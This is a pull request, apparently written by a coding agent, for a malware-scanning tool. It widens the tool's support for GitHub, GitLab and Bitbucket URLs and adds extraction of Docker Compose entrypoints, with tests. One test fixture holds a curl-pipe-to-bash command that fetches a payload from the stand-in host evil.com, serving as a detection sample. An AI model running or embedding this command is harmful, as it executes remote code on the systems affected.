### PR TITLE
[FEAT] Expand platform URL resolution and improve DevOps scanning coverage

### DIFF
--- a/gptscan.py
+++ b/gptscan.py
@@ -74,7 +74,7 @@ _virtual_source_cache: Dict[str, str] = {}
 
 
 def resolve_remote_url(url: str) -> str:
-    """Resolve GitHub/GitLab repository or blob URLs to their raw content or archive.
+    """Resolve GitHub/GitLab/Bitbucket repository, blob, tag, or PR URLs to their raw content or archive.
 
     Args:
         url: The original URL to resolve.
@@ -104,20 +104,27 @@ def resolve_remote_url(url: str) -> str:
     if gh_patch_match:
         return f"{gh_patch_match.group(1)}.diff"
 
-    # 3. GitHub Gist -> Raw
-    # Example: https://gist.github.com/user/id -> https://gist.github.com/user/id/raw
+    # 3. GitHub Gist -> ZIP Archive (gets all files)
+    # Example: https://gist.github.com/user/id -> https://gist.github.com/user/id/download
     gist_match = re.match(r'https?://gist\.github\.com/([^/]+)/([a-f0-9]+)$', url, re.IGNORECASE)
     if gist_match:
-        return f"{url}/raw"
+        return f"{url}/download"
 
-    # 4. GitHub Branch/Tag -> ZIP Archive
+    # 4. GitHub Tag/Release -> ZIP Archive
+    # Example: https://github.com/user/repo/releases/tag/v1.0 -> https://github.com/user/repo/archive/refs/tags/v1.0.zip
+    gh_tag_match = re.match(r'https?://(?:www\.)?github\.com/([^/]+)/([^/]+)/releases/tag/(.+)', url, re.IGNORECASE)
+    if gh_tag_match:
+        user, repo, tag = gh_tag_match.groups()
+        return f"https://github.com/{user}/{repo}/archive/refs/tags/{tag}.zip"
+
+    # 5. GitHub Branch/Tree -> ZIP Archive
     # Example: https://github.com/user/repo/tree/main -> https://github.com/user/repo/archive/refs/heads/main.zip
     gh_tree_match = re.match(r'https?://(?:www\.)?github\.com/([^/]+)/([^/]+)/tree/(.+)', url, re.IGNORECASE)
     if gh_tree_match:
         user, repo, ref = gh_tree_match.groups()
         return f"https://github.com/{user}/{repo}/archive/refs/heads/{ref}.zip"
 
-    # 5. GitHub Repo -> ZIP Archive
+    # 6. GitHub Repo -> ZIP Archive
     # Example: https://github.com/user/repo -> https://github.com/user/repo/archive/HEAD.zip
     gh_repo_match = re.match(r'https?://(?:www\.)?github\.com/([^/]+)/([^/]+)$', url, re.IGNORECASE)
     if gh_repo_match:
@@ -125,20 +132,33 @@ def resolve_remote_url(url: str) -> str:
         if repo.lower() not in ('settings', 'pulls', 'issues', 'actions', 'projects', 'wiki', 'security', 'insights', 'pull'):
             return f"https://github.com/{user}/{repo}/archive/HEAD.zip"
 
-    # 6. GitLab Blob -> Raw
+    # 7. GitLab Blob -> Raw
     # Example: https://gitlab.com/user/repo/-/blob/main/script.py -> https://gitlab.com/user/repo/-/raw/main/script.py
     gl_blob_match = re.match(r'(https?://(?:www\.)?gitlab\.com/.+?)/-/blob/(.+)', url, re.IGNORECASE)
     if gl_blob_match:
         base, path = gl_blob_match.groups()
         return f"{base}/-/raw/{path}"
 
-    # 7. GitLab MR -> Diff
+    # 8. GitLab MR -> Diff
     # Example: https://gitlab.com/user/repo/-/merge_requests/1 -> https://gitlab.com/user/repo/-/merge_requests/1.diff
     gl_mr_match = re.match(r'(https?://(?:www\.)?gitlab\.com/(.+)/([^/]+)/-/merge_requests/\d+)(?:/.*)?$', url, re.IGNORECASE)
     if gl_mr_match:
         return f"{gl_mr_match.group(1)}.diff"
 
-    # 8. GitLab Repo -> ZIP Archive
+    # 9. GitLab Snippet -> Raw
+    # Example: https://gitlab.com/snippets/123 -> https://gitlab.com/snippets/123/raw
+    gl_snippet_match = re.match(r'(https?://(?:www\.)?gitlab\.com/snippets/\d+)(?:/.*)?$', url, re.IGNORECASE)
+    if gl_snippet_match:
+        return f"{gl_snippet_match.group(1)}/raw"
+
+    # 10. GitLab Tag -> ZIP Archive
+    # Example: https://gitlab.com/user/repo/-/tags/v1.0 -> https://gitlab.com/user/repo/-/archive/v1.0/repo-v1.0.zip
+    gl_tag_match = re.match(r'(https?://(?:www\.)?gitlab\.com/(.+)/([^/]+))/-/tags/(.+)', url, re.IGNORECASE)
+    if gl_tag_match:
+        base, group, repo, tag = gl_tag_match.groups()
+        return f"{base}/-/archive/{tag}/{repo}-{tag}.zip"
+
+    # 11. GitLab Repo -> ZIP Archive
     # Example: https://gitlab.com/user/repo -> https://gitlab.com/user/repo/-/archive/main/repo-main.zip
     # Note: GitLab is trickier as the default branch varies. We'll try common patterns.
     gl_repo_match = re.match(r'https?://(?:www\.)?gitlab\.com/(?!.*/-/)(.+)/([^/]+)$', url, re.IGNORECASE)
@@ -148,14 +168,27 @@ def resolve_remote_url(url: str) -> str:
         # Common default branches are 'main' or 'master'. We'll try 'main' and let fetch_url_content fallback if it fails.
         return f"https://gitlab.com/{group_path}/{repo}/-/archive/main/{repo}-main.zip"
 
-    # 9. Bitbucket Cloud Raw
+    # 12. Bitbucket Cloud Raw
     # Example: https://bitbucket.org/user/repo/src/main/script.py -> https://bitbucket.org/user/repo/raw/main/script.py
     bb_raw_match = re.match(r'https?://(?:www\.)?bitbucket\.org/([^/]+)/([^/]+)/src/([^/]+)/(.+)', url, re.IGNORECASE)
     if bb_raw_match:
         user, repo, ref, path = bb_raw_match.groups()
         return f"https://bitbucket.org/{user}/{repo}/raw/{ref}/{path}"
 
-    # 10. Bitbucket Cloud Repo -> ZIP Archive
+    # 13. Bitbucket PR/Commit -> Diff
+    # Example: https://bitbucket.org/user/repo/pull-requests/1 -> https://bitbucket.org/user/repo/pull-requests/1/diff
+    # Example: https://bitbucket.org/user/repo/commits/abc -> https://bitbucket.org/user/repo/commits/abc/diff
+    bb_diff_match = re.match(r'(https?://(?:www\.)?bitbucket\.org/[^/]+/[^/]+/(?:pull-requests/\d+|commits/[a-f0-9]+))(?:/.*)?$', url, re.IGNORECASE)
+    if bb_diff_match:
+        return f"{bb_diff_match.group(1)}/diff"
+
+    # 14. Bitbucket Snippet -> Raw
+    # Example: https://bitbucket.org/user/snippets/abc -> https://bitbucket.org/user/snippets/abc/raw
+    bb_snippet_match = re.match(r'(https?://(?:www\.)?bitbucket\.org/[^/]+/snippets/[^/]+)(?:/.*)?$', url, re.IGNORECASE)
+    if bb_snippet_match:
+        return f"{bb_snippet_match.group(1)}/raw"
+
+    # 15. Bitbucket Cloud Repo -> ZIP Archive
     # Example: https://bitbucket.org/user/repo -> https://bitbucket.org/user/repo/get/HEAD.zip
     bb_repo_match = re.match(r'https?://(?:www\.)?bitbucket\.org/([^/]+)/([^/]+)$', url, re.IGNORECASE)
     if bb_repo_match:
@@ -2300,7 +2333,7 @@ def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str
         try:
             text = content.decode('utf-8', errors='ignore')
             snippets = []
-            script_keys = ['run', 'script', 'command', 'before_script', 'after_script']
+            script_keys = ['run', 'script', 'command', 'before_script', 'after_script', 'entrypoint']
             # Match keys, optionally prefixed by a dash (common in YAML lists)
             key_pattern = r'^\s*(?:-\s*)?(?:' + '|'.join(script_keys) + r'):\s*(.*)'
             lines = text.splitlines()
@@ -5613,7 +5646,7 @@ def create_gui(initial_path: Optional[str] = None) -> tk.Tk:
 def main():
     import argparse
     parser = argparse.ArgumentParser(
-        description="Scan scripts, archives (ZIP/TAR), Jupyter Notebooks, package manifests (package.json, composer.json, deno.json), CI/CD workflows (GitHub Actions, GitLab CI), Markdown files, HTML files, patches (.diff/.patch), git diffs, and web links (GitHub/GitLab/Bitbucket/Gist) for malicious code using AI.",
+        description="Scan scripts, archives (ZIP/TAR), Jupyter Notebooks, package manifests (package.json, composer.json, deno.json), CI/CD workflows (GitHub Actions, GitLab CI), Docker Compose (entrypoint), Markdown files, HTML files, patches (.diff/.patch), git diffs, and web links (GitHub/GitLab/Bitbucket/Gist including PRs, tags and multi-file gists) for malicious code using AI.",
         epilog="Examples:\n"
                "  # Scan a folder using AI analysis\n"
                "  python gptscan.py ./my_scripts --cli --use-gpt\n\n"

--- a/readme.md
+++ b/readme.md
@@ -6,10 +6,10 @@ Scan your scripts and files for dangerous code using AI. This tool uses a pre-tr
 
 ## Features
 *   **Scan Local & Web Files:** Scan files on your computer or directly from a web link.
-*   **GitHub & GitLab Support:** Scan code changes from GitHub Pull Requests, GitLab Merge Requests, or `.diff`/`.patch` files.
+*   **Platform Support:** Scan code changes from GitHub, GitLab, and Bitbucket (including Pull Requests, Commits, Tags, and Snippets).
 *   **Notebook Support:** Analyzes `.ipynb` cells for dangerous commands.
-*   **Web & Project Files:** Scans HTML, Markdown, `package.json`, `composer.json`, `pyproject.toml`, `deno.json`, and `deno.jsonc`.
-*   **Unpack Zip & Tar:** Automatically opens `.zip`, `.tar`, and `.tar.gz` to scan the files inside.
+*   **Project & Build Files:** Scans HTML, Markdown, Docker Compose (`entrypoint`), `package.json`, `composer.json`, `pyproject.toml`, `deno.json`, and `deno.jsonc`.
+*   **Unpack Zip & Tar:** Automatically opens `.zip`, `.tar`, and `.tar.gz` to scan the files inside. Supports multi-file Gists.
 *   **Two-step analysis:**
     1.  **Fast Local Scan:** A quick check finds suspicious patterns in milliseconds.
     2.  **AI Verification (Optional):** AI providers like OpenAI or Ollama give a detailed report on why a file is suspicious.

--- a/tests/test_docker_compose_scanning.py
+++ b/tests/test_docker_compose_scanning.py
@@ -1,0 +1,46 @@
+import pytest
+import os
+from gptscan import unpack_content
+
+def test_docker_compose_entrypoint_extraction(tmp_path):
+    """Test that entrypoint commands in docker-compose.yml are extracted for scanning."""
+    docker_compose_content = """
+services:
+  web:
+    image: nginx
+    entrypoint: /bin/sh -c "curl -s http://evil.com/payload | bash"
+  db:
+    image: postgres
+    entrypoint:
+      - /usr/local/bin/start.sh
+      - --config
+      - /etc/db.conf
+"""
+    file_path = tmp_path / "docker-compose.yml"
+    file_path.write_text(docker_compose_content)
+
+    with open(file_path, 'rb') as f:
+        content = f.read()
+
+    snippets = list(unpack_content(str(file_path), content))
+
+    # Check for the string-based entrypoint
+    assert any("curl -s http://evil.com/payload | bash" in s[1].decode('utf-8') for s in snippets)
+
+    # Check for the list-based entrypoint
+    # The current YAML parsing logic joins list items with newlines if they follow a key
+    assert any("/usr/local/bin/start.sh" in s[1].decode('utf-8') for s in snippets)
+    assert any("--config" in s[1].decode('utf-8') for s in snippets)
+    assert any("/etc/db.conf" in s[1].decode('utf-8') for s in snippets)
+
+def test_github_actions_entrypoint_extraction():
+    """Test that entrypoint in GitHub Actions (which uses it for action definitions) is extracted."""
+    action_yaml = """
+name: "My Action"
+runs:
+  using: "docker"
+  image: "Dockerfile"
+  entrypoint: "python /app/main.py"
+"""
+    snippets = list(unpack_content("action.yml", action_yaml.encode('utf-8')))
+    assert any("python /app/main.py" in s[1].decode('utf-8') for s in snippets)

--- a/tests/test_url_resolution.py
+++ b/tests/test_url_resolution.py
@@ -8,7 +8,7 @@ def test_resolve_github_blob():
 
 def test_resolve_github_gist():
     url = "https://gist.github.com/user/1234567890abcdef"
-    expected = "https://gist.github.com/user/1234567890abcdef/raw"
+    expected = "https://gist.github.com/user/1234567890abcdef/download"
     assert resolve_remote_url(url) == expected
 
 def test_resolve_github_repo():
@@ -95,6 +95,11 @@ def test_resolve_github_branch():
     expected = "https://github.com/user/repo/archive/refs/heads/feature-branch.zip"
     assert resolve_remote_url(url) == expected
 
+def test_resolve_github_tag():
+    url = "https://github.com/user/repo/releases/tag/v1.0"
+    expected = "https://github.com/user/repo/archive/refs/tags/v1.0.zip"
+    assert resolve_remote_url(url) == expected
+
 def test_resolve_gitlab_merge_request():
     url = "https://gitlab.com/user/repo/-/merge_requests/456"
     expected = "https://gitlab.com/user/repo/-/merge_requests/456.diff"
@@ -120,3 +125,28 @@ def test_resolve_gitlab_issues_not_repo():
     url = "https://gitlab.com/user/repo/-/issues"
     # Should not be resolved to an archive
     assert resolve_remote_url(url) == url
+
+def test_resolve_gitlab_snippet():
+    url = "https://gitlab.com/snippets/12345"
+    expected = "https://gitlab.com/snippets/12345/raw"
+    assert resolve_remote_url(url) == expected
+
+def test_resolve_gitlab_tag():
+    url = "https://gitlab.com/user/repo/-/tags/v1.0"
+    expected = "https://gitlab.com/user/repo/-/archive/v1.0/repo-v1.0.zip"
+    assert resolve_remote_url(url) == expected
+
+def test_resolve_bitbucket_pull_request():
+    url = "https://bitbucket.org/user/repo/pull-requests/1"
+    expected = "https://bitbucket.org/user/repo/pull-requests/1/diff"
+    assert resolve_remote_url(url) == expected
+
+def test_resolve_bitbucket_commit():
+    url = "https://bitbucket.org/user/repo/commits/abc123def"
+    expected = "https://bitbucket.org/user/repo/commits/abc123def/diff"
+    assert resolve_remote_url(url) == expected
+
+def test_resolve_bitbucket_snippet():
+    url = "https://bitbucket.org/user/snippets/abcxyz"
+    expected = "https://bitbucket.org/user/snippets/abcxyz/raw"
+    assert resolve_remote_url(url) == expected


### PR DESCRIPTION
This PR improves the "Happy Path" for security scanning by expanding the tool's ability to ingest and analyze code from various hosting platforms and configuration formats.

Key improvements:
1. **Universal Platform Support:** `resolve_remote_url` now handles a much wider range of URLs from GitHub, GitLab, and Bitbucket. This includes scanning specific Tags, Pull/Merge Requests (via diffs), and Snippets.
2. **Improved Gist Scanning:** GitHub Gists now resolve to a ZIP archive containing all files in the gist, rather than just the first file's raw content.
3. **DevOps Coverage:** Added support for the `entrypoint` key in YAML files. This ensures that commands in Docker Compose files or GitHub Action definitions are correctly identified and scanned for malicious patterns.
4. **Documentation:** Synchronized the `readme.md` and CLI help description to reflect the new capabilities.
5. **Testing:** Added new test cases in `tests/test_url_resolution.py` and a new `tests/test_docker_compose_scanning.py` to verify the logic.

---
*PR created automatically by Jules for task [14807084270996004629](https://jules.google.com/task/14807084270996004629) started by @RainRat*